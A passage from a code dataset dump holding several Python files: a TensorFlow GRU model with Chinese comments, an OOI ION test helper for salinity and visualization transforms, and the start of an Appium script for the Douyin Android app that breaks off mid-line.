data_random[i][27:30]]\r\n\r\n#训练集输出\r\ndata_y=np.zeros((step_number,5,3),dtype=float)#定义如(8000,5,3)的格式\r\nfor i in range(step_number):\r\n data_y[i]=[data_random[i][0:3],\r\n data_random[i][3:6],\r\n data_random[i][6:9],\r\n data_random[i][9:12],\r\n data_random[i][12:15]]\r\n\r\n\r\nprint(np.shape(data_x))\r\nprint(data_x[1])\r\n\r\n\r\n\"tensorflow 组建rnn网络部分\"\r\n\r\n\r\n#输入数组是7*3\r\n# 序列段长度,即是几步\r\ntime_step = 5\r\n# 隐藏层节点数目,每个LSTM内部神经元数量\r\nrnn_unit = 50\r\n# cell层数\r\ngru_layers = 3\r\n# 序列段批处理数目\r\nbatch_size = 50\r\n# batch数目\r\nn_batch=step_number//batch_size\r\n# 输入维度\r\ninput_size = 3\r\n# 输出维度\r\noutput_size = 3\r\n# 学习率\r\nlr = 0.1\r\n#前置网络的隐藏层神经元数量\r\nhidden_size=20\r\n\r\n#输出层网络的隐藏层神经元数量\r\nout_hidden_size=10\r\n\r\n#这里的none表示第一个维度可以是任意值\r\nx=tf.placeholder(tf.float32,[None,time_step, input_size])#\r\ny=tf.placeholder(tf.float32,[None, time_step, output_size])\r\n\r\n\r\n\r\n#定义输入输出权值及偏置值\r\n'同时注明一点,这里的bias及weights的写法必须要是这样,后面的saver函数才能正常调用'\r\nweights = {\r\n 'in': tf.Variable(tf.random_normal([input_size, hidden_size])),\r\n 'in_hidden': tf.Variable(tf.random_normal([hidden_size, rnn_unit])),\r\n 'out_hidden': tf.Variable(tf.random_normal([rnn_unit, out_hidden_size])),\r\n 'out': tf.Variable(tf.constant(0.1, shape=[out_hidden_size, output_size]))\r\n}\r\nbiases = {\r\n 'in': tf.Variable(tf.random_normal([hidden_size])),\r\n 'in_hidden': tf.Variable(tf.random_normal([rnn_unit])),\r\n 'out_hidden': tf.Variable(tf.random_normal([out_hidden_size])),\r\n 'out': tf.Variable(tf.constant(0.1, shape=[output_size]))\r\n}\r\n\r\n\r\n'''\r\n结论上来说,如果cell为LSTM,那 state是个tuple,分别代表Ct 和 ht,其中 ht与outputs中的对应的最后一个时刻的输出相等,\r\n假设state形状为[ 2,batch_size, cell.output_size ],outputs形状为 [ batch_size, max_time, cell.output_size ],\r\n那么state[ 1, batch_size, : ] == outputs[ batch_size, -1, : ];如果cell为GRU,那么同理,state其实就是 ht,state ==outputs[ -1 ]\r\n'''\r\n\r\ndef lstm(batch):\r\n\r\n # 定义输入的权值及偏置值\r\n w_in = weights['in']\r\n b_in = biases['in']\r\n\r\n w_hidden = weights['in_hidden']\r\n b_hidden = biases['in_hidden']\r\n\r\n\r\n # 对输入rnn网络的数据做前置处理\r\n input = tf.reshape(x, [-1, input_size]) #x被置位(bacth_size*time_step,input_size) 的格式(250,3),由于是三维数组无法直接乘,需要进行处理\r\n\r\n\r\n #前置网络的隐藏层处理\r\n input_hidden=tf.nn.sigmoid(tf.matmul(input, w_in) + b_in)\r\n\r\n input_rnn = tf.nn.sigmoid(tf.matmul(input_hidden, w_hidden) + b_hidden)\r\n\r\n input_rnn = tf.reshape(input_rnn, [-1, time_step, rnn_unit])#这里是真实输入rnn网络格式的数据\r\n\r\n #定义GRU网络的参数\r\n GRU_cells = tf.nn.rnn_cell.MultiRNNCell([tf.nn.rnn_cell.GRUCell(rnn_unit) for _ in range(gru_layers)])\r\n\r\n init_state = GRU_cells.zero_state(batch, dtype=tf.float32)\r\n\r\n output_rnn, final_states = tf.nn.dynamic_rnn(GRU_cells, input_rnn, initial_state=init_state, dtype=tf.float32)\r\n\r\n output = tf.reshape(output_rnn, [-1, rnn_unit])\r\n\r\n print(tf.shape(output))\r\n\r\n # 定义输出权值及偏置值,并对LSTM的输出值做处理\r\n w_out_hidden=weights['out_hidden']\r\n b_out_hidden = biases['out_hidden']\r\n\r\n w_out = weights['out']\r\n b_out = biases['out']\r\n\r\n out_hidden=tf.nn.relu(tf.matmul(output,w_out_hidden)+b_out_hidden)\r\n pred = tf.matmul(out_hidden, w_out) + b_out\r\n\r\n return pred, final_states\r\n\r\n\r\n\r\ndef train_lstm():\r\n global batch_size\r\n with tf.variable_scope(\"sec_lstm\"):\r\n pred, _ = lstm(batch_size)\r\n\r\n loss = tf.reduce_mean(tf.square(tf.reshape(pred, [-1]) - tf.reshape(y, [-1])))\r\n train_op = tf.train.AdamOptimizer(lr).minimize(loss)\r\n\r\n #定义变量存储参数\r\n saver = tf.train.Saver(tf.global_variables())\r\n loss_list = []\r\n\r\n\r\n with 
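The (step_number, 30) table above interleaves, per row, the displacements x1..x3 at steps i+2..i+6 with the force triples [F1, 0, F3] at steps i..i+4, then slices the halves back out into (N, 5, 3) arrays. The same windowing without the manual index arithmetic, assuming the displacements and forces are already stacked column-wise:

    import numpy as np

    def make_windows(x123, f13, steps=5, offset=2):
        # x123: (T, 3) displacements; f13: (T, 3) forces with a zero
        # middle column, mirroring the [F1, 0, F3] triples above.
        n = len(x123) - steps - offset
        data_y = np.stack([x123[i + offset : i + offset + steps] for i in range(n)])
        data_x = np.stack([f13[i : i + steps] for i in range(n)])
        return data_x, data_y   # each (n, steps, 3)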
tf.Session() as sess:\r\n sess.run(tf.global_variables_initializer())\r\n for epoch in range(300): # We can increase the number of iterations to gain better result.\r\n\r\n for i in range(n_batch):\r\n\r\n _, loss_ = sess.run([train_op, loss], feed_dict={x: data_x[batch_size * i:batch_size * (i + 1)],\r\n y: data_y[batch_size * i:batch_size * (i + 1)]})\r\n\r\n loss_list.append(loss_)\r\n\r\n\r\n\r\n if epoch % 10 == 0:\r\n print(\"Number of epoch:\", epoch, \" loss:\", loss_list[-1])\r\n\r\n if epoch > 0 and loss_list[-2] > loss_list[-1]:\r\n saver.save(sess, 'model_save1\\\\modle.ckpt')\r\n\r\n\r\ntrain_lstm()#运行LSTM网络\r\n\r\n\r\n\r\n\r\n\"测试部分\"\r\n\r\n#测试集输入,\r\ntest_number=800\r\n\r\ntest_x=np.zeros((test_number,5,3),dtype=float)#定义如(800,5,3)的格式\r\nfor i in range(test_number):\r\n test_x[i]=[data[i][15:18],\r\n data[i][18:21],\r\n data[i][21:24],\r\n data[i][24:27],\r\n data[i][27:30]] #这里的test_x实则为F1 F3不同时刻输入的组合\r\n\r\nprint(np.shape(test_x))\r\n\r\n\r\n#用模型计算得出的输出\r\nwith tf.variable_scope(\"sec_lstm\", reuse=tf.AUTO_REUSE):\r\n pred, _ = lstm(1) #这里预测,所以输入的batch_size为1就可以\r\nsaver = tf.train.Saver(tf.global_variables())\r\nwith tf.Session() as sess:\r\n saver.restore(sess, 'model_save1\\\\modle.ckpt')\r\n\r\n\r\n#实际上有5组X1,X2,X3输出,仅仅在时间序列上有一定的偏差,这里分别绘制 查看区别\r\n predict_1_x1 = np.array([])\r\n predict_1_x2 = np.array([])\r\n predict_1_x3 = np.array([])\r\n\r\n predict_2_x1 = np.array([])\r\n predict_2_x2 = np.array([])\r\n predict_2_x3 = np.array([])\r\n\r\n predict_3_x1 = np.array([])\r\n predict_3_x2 = np.array([])\r\n predict_3_x3 = np.array([])\r\n\r\n predict_4_x1 = np.array([])\r\n predict_4_x2 = np.array([])\r\n predict_4_x3 = np.array([])\r\n\r\n predict_5_x1 = np.array([])\r\n predict_5_x2 = np.array([])\r\n predict_5_x3 = np.array([])\r\n\r\n\r\n for i in range(test_number):\r\n next_seq = sess.run(pred, feed_dict={x: [test_x[i]]}) #next_seq输出格式为(time_step,output_size),这里为(5,3,)\r\n np.array(next_seq)\r\n\r\n\r\n '输出的格式为【time_step,output_size】,这里time_step为5,每一个步骤都有x1 x2 x3的输出,即有5组x1 x2 x3输出' \\\r\n ''\r\n predict_1_x1=np.append(predict_1_x1,next_seq[0][0])\r\n predict_1_x2 = np.append(predict_1_x2, next_seq[0][1])\r\n predict_1_x3 = np.append(predict_1_x3, next_seq[0][2])\r\n\r\n predict_2_x1=np.append(predict_2_x1,next_seq[1][0])\r\n predict_2_x2 = np.append(predict_2_x2, next_seq[1][1])\r\n predict_2_x3 = np.append(predict_2_x3, next_seq[1][2])\r\n\r\n predict_3_x1=np.append(predict_3_x1,next_seq[2][0])\r\n predict_3_x2 = np.append(predict_3_x2, next_seq[2][1])\r\n predict_3_x3 = np.append(predict_3_x3, next_seq[2][2])\r\n\r\n predict_4_x1 = np.append(predict_4_x1, next_seq[3][0])\r\n predict_4_x2 = np.append(predict_4_x2, next_seq[3][1])\r\n predict_4_x3 = np.append(predict_4_x3, next_seq[3][2])\r\n\r\n predict_5_x1 = np.append(predict_5_x1, next_seq[4][0])\r\n predict_5_x2 = np.append(predict_5_x2, next_seq[4][1])\r\n predict_5_x3 = np.append(predict_5_x3, next_seq[4][2])\r\n\r\n\r\n\r\n\r\n\r\n #绘制图像\r\n plt.subplot(511)\r\n plt.plot(t, x1, label='x1')\r\n plt.plot(t[2:2+test_number], predict_1_x1, color='r')\r\n plt.plot(t[3:3 + test_number], predict_2_x1, color='g')\r\n plt.plot(t[4:4 + test_number], predict_3_x1)\r\n plt.plot(t[5:5 + test_number], predict_4_x1)\r\n\r\n\r\n plt.subplot(512)\r\n plt.plot(t, x2, label='x2')\r\n plt.plot(t[2:2+test_number], predict_1_x2, color='r')\r\n plt.plot(t[3:3 + test_number], predict_2_x2, color='g')\r\n plt.plot(t[4:4 + test_number], predict_3_x2)\r\n plt.plot(t[5:5 + test_number], predict_4_x2)\r\n\r\n\r\n plt.subplot(513)\r\n 
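train_lstm saves a checkpoint whenever the latest batch loss is merely lower than the one just before it (loss_list[-2] > loss_list[-1]), so a later, worse model can overwrite a better one. The usual best-so-far pattern, shown here with a stand-in loss value instead of sess.run:

    import math, random

    best = math.inf
    for step in range(100):
        loss = abs(random.gauss(0, 1)) / (step + 1)   # stand-in for the batch loss
        if loss < best:            # checkpoint only on a new best
            best = loss
            # saver.save(sess, 'model_save1\\modle.ckpt')  # as in train_lstm
    print("best loss:", best)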
plt.plot(t, x3, label='x3')\r\n plt.plot(t[2:2+test_number], predict_1_x3, color='r')\r\n plt.plot(t[3:3 + test_number], predict_2_x3, color='g')\r\n plt.plot(t[4:4 + test_number], predict_3_x3, color='r')\r\n plt.plot(t[5:5 + test_number], predict_4_x3, color='g')\r\n\r\n\r\n plt.subplot(514)\r\n plt.plot(t, F1, label='F1')\r\n plt.subplot(515)\r\n plt.plot(t, F3, label='F2')\r\n\r\n plt.show()\r\n","sub_path":"时序神经网络模型/GRU网络+前置感知器模型.py","file_name":"GRU网络+前置感知器模型.py","file_ext":"py","file_size_in_byte":11764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"73871387","text":"from pyon.public import Container, log, IonObject\nfrom interface.objects import CouchStorage, ProcessDefinition\nfrom pyon.ion.stream import StandaloneStreamSubscriber\nfrom ion.services.dm.utility.granule_utils import time_series_domain\nfrom seawater.gibbs import SP_from_cndr\nfrom seawater.gibbs import cte\n\nfrom numpy.testing import assert_array_almost_equal\n\nfrom pyon.util.int_test import IonIntegrationTestCase\nfrom pyon.public import CFG, RT, LCS, PRED\nfrom pyon.core.exception import BadRequest, Inconsistent\n\nimport imghdr\nimport gevent\nimport numpy\nimport simplejson\nimport base64\nimport ast\n\nfrom interface.objects import Granule\nfrom ion.services.dm.utility.granule.record_dictionary import RecordDictionaryTool\nfrom pyon.util.containers import get_safe\nfrom seawater.gibbs import SP_from_cndr\nfrom seawater.gibbs import cte\n\n\nclass VisualizationIntegrationTestHelper(IonIntegrationTestCase):\n\n def on_start(self):\n super(VisualizationIntegrationTestHelper, self).on_start()\n\n\n def create_ctd_input_stream_and_data_product(self, data_product_name='ctd_parsed'):\n\n cc = self.container\n assertions = self.assertTrue\n\n #-------------------------------\n # Create CTD Parsed as the initial data product\n #-------------------------------\n # create a stream definition for the data from the ctd simulator\n ctd_pdict_id = self.datasetclient.read_parameter_dictionary_by_name('ctd_parsed_param_dict', id_only=True)\n ctd_stream_def_id = self.pubsubclient.create_stream_definition(name='Simulated CTD data', parameter_dictionary_id=ctd_pdict_id)\n\n\n log.debug('Creating new CDM data product with a stream definition')\n\n tdom, sdom = time_series_domain()\n\n dp_obj = IonObject(RT.DataProduct,\n name=data_product_name,\n description='ctd stream test',\n temporal_domain = tdom.dump(),\n spatial_domain = sdom.dump())\n\n ctd_parsed_data_product_id = self.dataproductclient.create_data_product(dp_obj, ctd_stream_def_id)\n self.addCleanup(self.dataproductclient.delete_data_product, ctd_parsed_data_product_id)\n\n log.debug('new ctd_parsed_data_product_id = %s' % ctd_parsed_data_product_id)\n\n #Only ever need one device for testing purposes.\n instDevice_obj,_ = self.rrclient.find_resources(restype=RT.InstrumentDevice, name='SBE37IMDevice')\n if instDevice_obj:\n instDevice_id = instDevice_obj[0]._id\n else:\n instDevice_obj = IonObject(RT.InstrumentDevice, name='SBE37IMDevice', description=\"SBE37IMDevice\", serial_number=\"12345\" )\n instDevice_id = self.imsclient.create_instrument_device(instrument_device=instDevice_obj)\n\n self.damsclient.assign_data_product(input_resource_id=instDevice_id, data_product_id=ctd_parsed_data_product_id)\n\n self.dataproductclient.activate_data_product_persistence(data_product_id=ctd_parsed_data_product_id)\n self.addCleanup(self.dataproductclient.suspend_data_product_persistence, ctd_parsed_data_product_id)\n\n # 
Retrieve the id of the OUTPUT stream from the out Data Product\n stream_ids, _ = self.rrclient.find_objects(ctd_parsed_data_product_id, PRED.hasStream, None, True)\n assertions(len(stream_ids) > 0 )\n ctd_stream_id = stream_ids[0]\n\n return ctd_stream_id, ctd_parsed_data_product_id\n\n def start_simple_input_stream_process(self, ctd_stream_id):\n return self.start_input_stream_process(ctd_stream_id)\n\n def start_sinusoidal_input_stream_process(self, ctd_stream_id):\n return self.start_input_stream_process(ctd_stream_id, 'ion.processes.data.sinusoidal_stream_publisher', 'SinusoidalCtdPublisher')\n\n def start_input_stream_process(self, ctd_stream_id, module = 'ion.processes.data.ctd_stream_publisher', class_name= 'SimpleCtdPublisher'):\n ###\n ### Start the process for producing the CTD data\n ###\n # process definition for the ctd simulator...\n producer_definition = ProcessDefinition()\n producer_definition.executable = {\n 'module':module,\n 'class':class_name\n }\n\n ctd_sim_procdef_id = self.process_dispatcher.create_process_definition(process_definition=producer_definition)\n\n # Start the ctd simulator to produce some data\n configuration = {\n 'process':{\n 'stream_id':ctd_stream_id,\n }\n }\n\n ctd_sim_pid = self.process_dispatcher.schedule_process(process_definition_id=ctd_sim_procdef_id, configuration=configuration)\n\n return ctd_sim_pid\n\n def start_output_stream_and_listen(self, ctd_stream_id, data_product_stream_ids, message_count_per_stream=10):\n assertions = self.assertTrue\n exchange_name = 'workflow_test'\n\n ###\n ### Make a subscriber in the test to listen for transformed data\n ###\n\n salinity_subscription_id = self.pubsubclient.create_subscription(\n name = 'test workflow transformations',\n exchange_name = exchange_name,\n stream_ids = data_product_stream_ids\n )\n\n result = gevent.event.AsyncResult()\n results = []\n message_count = len(data_product_stream_ids) * message_count_per_stream\n\n def message_received(message, stream_route, stream_id):\n # Heads\n results.append(message)\n if len(results) >= message_count: #Only wait for so many messages - per stream\n result.set(True)\n\n subscriber = StandaloneStreamSubscriber(exchange_name='workflow_test', callback=message_received)\n subscriber.xn.purge()\n self.addCleanup(subscriber.xn.delete)\n subscriber.start()\n\n # after the queue has been created it is safe to activate the subscription\n self.pubsubclient.activate_subscription(subscription_id=salinity_subscription_id)\n\n #Start the input stream process\n if ctd_stream_id is not None:\n ctd_sim_pid = self.start_simple_input_stream_process(ctd_stream_id)\n\n # Assert that we have received data\n assertions(result.get(timeout=60))\n\n # stop the flow parse the messages...\n if ctd_stream_id is not None:\n self.process_dispatcher.cancel_process(ctd_sim_pid) # kill the ctd simulator process - that is enough data\n\n self.pubsubclient.deactivate_subscription(subscription_id=salinity_subscription_id)\n\n subscriber.stop()\n\n return results\n\n\n def validate_messages(self, results):\n bin1 = numpy.array([])\n bin2 = numpy.array([])\n for message in results:\n rdt = RecordDictionaryTool.load_from_granule(message)\n if 'salinity' in message.data_producer_id:\n if 'double' in message.data_producer_id:\n bin2 = numpy.append(bin2, rdt['salinity'])\n else:\n bin1 = numpy.append(bin1, rdt['salinity'])\n\n\n\n assert_array_almost_equal(bin2, bin1 * 2.0)\n\n\n\n def validate_data_ingest_retrieve(self, dataset_id):\n\n assertions = self.assertTrue\n\n #validate that 
data was ingested\n replay_granule = self.data_retriever.retrieve_last_data_points(dataset_id, 10)\n rdt = RecordDictionaryTool.load_from_granule(replay_granule)\n salinity = get_safe(rdt, 'salinity')\n assertions(salinity != None)\n\n #retrieve all the granules from the database and check the values\n replay_granule_all = self.data_retriever.retrieve(dataset_id)\n rdt = RecordDictionaryTool.load_from_granule(replay_granule_all)\n for k, v in rdt.iteritems():\n if k == 'salinity':\n for val in numpy.nditer(v):\n assertions(val > 0)\n\n def create_salinity_data_process_definition(self):\n\n # Salinity: Data Process Definition\n\n #First look to see if it exists and if not, then create it\n dpd,_ = self.rrclient.find_resources(restype=RT.DataProcessDefinition, name='ctd_salinity')\n if len(dpd) > 0:\n return dpd[0]\n\n log.debug(\"Create data process definition SalinityTransform\")\n dpd_obj = IonObject(RT.DataProcessDefinition,\n name='ctd_salinity',\n description='create a salinity data product',\n module='ion.processes.data.transforms.ctd.ctd_L2_salinity',\n class_name='SalinityTransform')\n try:\n ctd_L2_salinity_dprocdef_id = self.dataprocessclient.create_data_process_definition(dpd_obj)\n except Exception as ex:\n self.fail(\"failed to create new SalinityTransform data process definition: %s\" %ex)\n\n # create a stream definition for the data from the salinity Transform\n ctd_pdict_id = self.datasetclient.read_parameter_dictionary_by_name('ctd_parsed_param_dict', id_only=True)\n sal_stream_def_id = self.pubsubclient.create_stream_definition(name='Salinity', parameter_dictionary_id=ctd_pdict_id)\n self.dataprocessclient.assign_stream_definition_to_data_process_definition(sal_stream_def_id, ctd_L2_salinity_dprocdef_id, binding='salinity' )\n\n return ctd_L2_salinity_dprocdef_id\n\n def create_salinity_doubler_data_process_definition(self):\n\n #First look to see if it exists and if not, then create it\n dpd,_ = self.rrclient.find_resources(restype=RT.DataProcessDefinition, name='salinity_doubler')\n if len(dpd) > 0:\n return dpd[0]\n\n # Salinity Doubler: Data Process Definition\n log.debug(\"Create data process definition SalinityDoublerTransform\")\n dpd_obj = IonObject(RT.DataProcessDefinition,\n name='salinity_doubler',\n description='create a salinity doubler data product',\n module='ion.processes.data.transforms.example_double_salinity',\n class_name='SalinityDoubler')\n try:\n salinity_doubler_dprocdef_id = self.dataprocessclient.create_data_process_definition(dpd_obj)\n except Exception as ex:\n self.fail(\"failed to create new SalinityDoubler data process definition: %s\" %ex)\n\n\n # create a stream definition for the data from the salinity Transform\n ctd_pdict_id = self.datasetclient.read_parameter_dictionary_by_name('ctd_parsed_param_dict', id_only=True)\n salinity_double_stream_def_id = self.pubsubclient.create_stream_definition(name='SalinityDoubler', parameter_dictionary_id=ctd_pdict_id)\n self.dataprocessclient.assign_stream_definition_to_data_process_definition(salinity_double_stream_def_id, salinity_doubler_dprocdef_id, binding='salinity' )\n\n return salinity_doubler_dprocdef_id\n\n\n def create_transform_process(self, data_process_definition_id, data_process_input_dp_id, stream_name):\n\n data_process_definition = self.rrclient.read(data_process_definition_id)\n\n # Find the link between the output Stream Definition resource and the Data Process Definition resource\n stream_ids,_ = self.rrclient.find_objects(data_process_definition._id, PRED.hasStreamDefinition, 
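validate_messages asserts that the doubled stream carries exactly twice the source salinity; numpy.testing compares element-wise to six decimal places by default. A minimal standalone version of that check:

    import numpy as np
    from numpy.testing import assert_array_almost_equal

    bin1 = np.array([33.1, 33.4, 33.9])
    bin2 = bin1 * 2.0
    assert_array_almost_equal(bin2, bin1 * 2.0)   # passes silently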
RT.StreamDefinition, id_only=True)\n if not stream_ids:\n raise Inconsistent(\"The data process definition %s is missing an association to an output stream definition\" % data_process_definition._id )\n process_output_stream_def_id = stream_ids[0]\n\n #Concatenate the name of the workflow and data process definition for the name of the data product output\n data_process_name = data_process_definition.name\n\n # Create the output data product of the transform\n\n tdom, sdom = time_series_domain()\n\n transform_dp_obj = IonObject(RT.DataProduct,\n name=data_process_name,\n description=data_process_definition.description,\n temporal_domain = tdom.dump(),\n spatial_domain = sdom.dump())\n\n transform_dp_id = self.dataproductclient.create_data_product(transform_dp_obj, process_output_stream_def_id)\n\n self.dataproductclient.activate_data_product_persistence(data_product_id=transform_dp_id)\n\n #last one out of the for loop is the output product id\n output_data_product_id = transform_dp_id\n\n # Create the transform data process\n log.debug(\"create data_process and start it\")\n data_process_id = self.dataprocessclient.create_data_process(\n data_process_definition_id = data_process_definition._id,\n in_data_product_ids = [data_process_input_dp_id],\n out_data_product_ids = [transform_dp_id])\n\n self.dataprocessclient.activate_data_process(data_process_id)\n\n\n #Find the id of the output data stream\n stream_ids, _ = self.rrclient.find_objects(transform_dp_id, PRED.hasStream, None, True)\n if not stream_ids:\n raise Inconsistent(\"The data process %s is missing an association to an output stream\" % data_process_id )\n\n return data_process_id, output_data_product_id\n\n\n\n def create_highcharts_data_process_definition(self):\n return helper_create_highcharts_data_process_definition(self.container)\n\n\n def validate_highcharts_transform_results(self, results):\n\n assertions = self.assertTrue\n\n # if its just one granule, wrap it up in a list so we can use the following for loop for a couple of cases\n if isinstance(results,Granule):\n results =[results]\n\n for g in results:\n\n if isinstance(g,Granule):\n\n rdt = RecordDictionaryTool.load_from_granule(g)\n hc_data_arr = get_safe(rdt, 'hc_data')\n\n if hc_data_arr == None:\n log.debug(\"hc_data in granule is None\")\n continue\n\n assertions(len(hc_data_arr) >= 0) # Need to come up with a better check\n\n hc_data = hc_data_arr[0]\n assertions(len(hc_data) >= 0)\n\n assertions(len(hc_data[0][\"name\"]) >= 0)\n assertions(len(hc_data[0][\"data\"]) >= 0)\n\n\n\n def create_mpl_graphs_data_process_definition(self):\n\n #First look to see if it exists and if not, then create it\n dpd,_ = self.rrclient.find_resources(restype=RT.DataProcessDefinition, name='mpl_graphs_transform')\n if len(dpd) > 0:\n return dpd[0]\n\n #Data Process Definition\n log.debug(\"Create data process definition MatplotlibGraphsTransform\")\n dpd_obj = IonObject(RT.DataProcessDefinition,\n name='mpl_graphs_transform',\n description='Convert data streams to Matplotlib graphs',\n module='ion.processes.data.transforms.viz.matplotlib_graphs',\n class_name='VizTransformMatplotlibGraphs')\n try:\n procdef_id = self.dataprocessclient.create_data_process_definition(dpd_obj)\n except Exception as ex:\n self.fail(\"failed to create new VizTransformMatplotlibGraphs data process definition: %s\" %ex)\n\n\n pdict_id = self.datasetclient.read_parameter_dictionary_by_name('graph_image_param_dict',id_only=True)\n # create a stream definition for the data\n stream_def_id = 
self.pubsubclient.create_stream_definition(name='VizTransformMatplotlibGraphs', parameter_dictionary_id=pdict_id)\n self.dataprocessclient.assign_stream_definition_to_data_process_definition(stream_def_id, procdef_id, binding='graph_image_param_dict' )\n\n return procdef_id\n\n def validate_mpl_graphs_transform_results(self, results):\n\n cc = self.container\n assertions = self.assertTrue\n\n # if its just one granule, wrap it up in a list so we can use the following for loop for a couple of cases\n if isinstance(results,Granule):\n results =[results]\n\n found_data = False\n for g in results:\n if isinstance(g,Granule):\n rdt = RecordDictionaryTool.load_from_granule(g)\n\n graphs = get_safe(rdt, 'matplotlib_graphs')\n\n if graphs == None:\n continue\n\n for graph in graphs[0]:\n\n # At this point only dictionaries containing image data should be passed\n # For some reason non dictionary values are filtering through.\n if not isinstance(graph, dict):\n continue\n\n assertions(graph['viz_product_type'] == 'matplotlib_graphs' )\n # check to see if the list (numpy array) contains actual images\n assertions(imghdr.what(graph['image_name'], h = graph['image_obj']) == 'png')\n found_data = True\n return found_data\n\n\n\n def validate_vis_service_highcharts_results(self, results):\n\n assertions = self.assertTrue\n assertions(results)\n\n hc_data = simplejson.loads(results)\n\n for series in hc_data:\n assertions(series[\"name\"])\n assertions(series[\"data\"])\n\n return\n\n def validate_vis_service_mpl_graphs_results(self, results_str):\n\n # convert incoming string to dict\n results = ast.literal_eval(results_str)\n\n assertions = self.assertTrue\n assertions(results)\n\n # check to see if the object passed is a dictionary with a valid image object in it\n image_format = results[\"content_type\"].lstrip(\"image/\")\n\n assertions(imghdr.what(results['image_name'], h = base64.decodestring(results['image_obj'])) == image_format)\n\n return\n\n def validate_multiple_vis_queue_messages(self, msg1, msg2):\n\n assertions = self.assertTrue\n\n # verify that the salinity in msg2 is a result of content from msg1\n rdt1 = RecordDictionaryTool.load_from_granule(msg1)\n rdt2 = RecordDictionaryTool.load_from_granule(msg2)\n\n # msg1 should not have salinity\n # assertions(rdt1['salinity'] == None)\n\n conductivity = rdt1['conductivity']\n pressure = rdt1['pressure']\n temperature = rdt1['temp']\n\n msg1_sal_value = SP_from_cndr(r=conductivity/cte.C3515, t=temperature, p=pressure)\n msg2_sal_value = rdt2['salinity']\n b = msg1_sal_value == msg2_sal_value\n\n if isinstance(b,bool):\n assertions(b)\n else:\n assertions(b.all())\n\n return\n\n def create_highcharts_workflow_def(self):\n\n return helper_create_highcharts_workflow_def(self.container)\n\n\n\ndef helper_create_highcharts_data_process_definition(container):\n\n from interface.services.coi.iresource_registry_service import ResourceRegistryServiceClient\n rrclient = ResourceRegistryServiceClient(node=container.node)\n\n #First look to see if it exists and if not, then create it\n dpd,_ = rrclient.find_resources(restype=RT.DataProcessDefinition, name='highcharts_transform')\n if len(dpd) > 0:\n return dpd[0]\n\n # Data Process Definition\n log.debug(\"Create data process definition for highcharts transform\")\n dpd_obj = IonObject(RT.DataProcessDefinition,\n name='highcharts_transform',\n description='Convert data streams to Highcharts data',\n module='ion.processes.data.transforms.viz.highcharts',\n class_name='VizTransformHighCharts')\n\n from 
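validate_multiple_vis_queue_messages recomputes salinity from conductivity with SP_from_cndr(r=C/cte.C3515, t=temperature, p=pressure). A quick sanity anchor for that routine, resting on the PSS-78 definition that a conductivity ratio of exactly 1 at 15 degC and 0 dbar is practical salinity 35 (a sketch; the library is normally called with arrays, as in the test above):

    from seawater.gibbs import SP_from_cndr

    # Standard seawater: C equals cte.C3515, so the ratio r is 1.0.
    sp = SP_from_cndr(r=1.0, t=15.0, p=0.0)
    print(sp)   # approximately 35.0 by the PSS-78 definition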
interface.services.sa.idata_process_management_service import DataProcessManagementServiceClient\n dataprocessclient = DataProcessManagementServiceClient(node=container.node)\n\n procdef_id = dataprocessclient.create_data_process_definition(dpd_obj)\n\n from interface.services.dm.idataset_management_service import DatasetManagementServiceClient\n datasetclient = DatasetManagementServiceClient(node=container.node)\n\n pdict_id = datasetclient.read_parameter_dictionary_by_name('highcharts', id_only=True)\n\n from interface.services.dm.ipubsub_management_service import PubsubManagementServiceClient\n pubsubclient = PubsubManagementServiceClient(node=container.node)\n\n # create a stream definition for the data from the\n stream_def_id = pubsubclient.create_stream_definition(name='VizTransformHighCharts', parameter_dictionary_id=pdict_id)\n dataprocessclient.assign_stream_definition_to_data_process_definition(stream_def_id, procdef_id, binding='highcharts' )\n\n return procdef_id\n\n\ndef helper_create_highcharts_workflow_def(container):\n\n from interface.services.coi.iresource_registry_service import ResourceRegistryServiceClient\n rrclient = ResourceRegistryServiceClient(node=container.node)\n\n # Check to see if the workflow defnition already exist\n workflow_def_ids,_ = rrclient.find_resources(restype=RT.WorkflowDefinition, name='Realtime_HighCharts', id_only=True)\n\n if len(workflow_def_ids) > 0:\n workflow_def_id = workflow_def_ids[0]\n else:\n # Build the workflow definition\n workflow_def_obj = IonObject(RT.WorkflowDefinition, name='Realtime_HighCharts',description='Convert stream data to HighCharts data')\n\n #Add a transformation process definition\n procdef_id = helper_create_highcharts_data_process_definition(container)\n workflow_step_obj = IonObject('DataProcessWorkflowStep', data_process_definition_id=procdef_id)\n workflow_def_obj.workflow_steps.append(workflow_step_obj)\n\n #Create it in the resource registry\n from interface.services.ans.iworkflow_management_service import WorkflowManagementServiceClient\n workflowclient = WorkflowManagementServiceClient(node=container.node)\n\n workflow_def_id = workflowclient.create_workflow_definition(workflow_def_obj)\n\n return workflow_def_id\n\n\ndef preload_ion_params(container):\n\n log.info(\"Preloading ...\")\n # load_parameter_scenarios\n container.spawn_process(\"Loader\", \"ion.processes.bootstrap.ion_loader\", \"IONLoader\", config=dict(\n op=\"load\",\n scenario=\"BETA\",\n #path=\"master\",\n path=\"https://docs.google.com/spreadsheet/pub?key=0ArYknstLVPe7dDZleTRRZzVfaFowSEpzaGVLTU9hUnc&output=xls\",\n categories=\"ParameterFunctions,ParameterDefs,ParameterDictionary,StreamDefinition,DataProcessDefinition,WorkflowDefinition\",\n clearcols=\"owner_id,org_ids\",\n #assets=\"res/preload/r2_ioc/ooi_assets\",\n parseooi=\"True\",\n ))","sub_path":"ion/services/ans/test/test_helper.py","file_name":"test_helper.py","file_ext":"py","file_size_in_byte":22177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"208397484","text":"from appium import webdriver\nimport time\n# import datetime\n\n\n\nserver = \"http://localhost:4723/wd/hub\"\nparam = {\n \"deviceName\": \"127.0.0.1:62001\",\n \"platformName\": \"Android\",\n \"platformVersion\": \"7.1.2\",\n \"appPackage\": \"com.ss.android.ugc.aweme\",\n \"appActivity\": \"com.ss.android.ugc.aweme.splash.SplashActivity\"\n}\ndriver = 
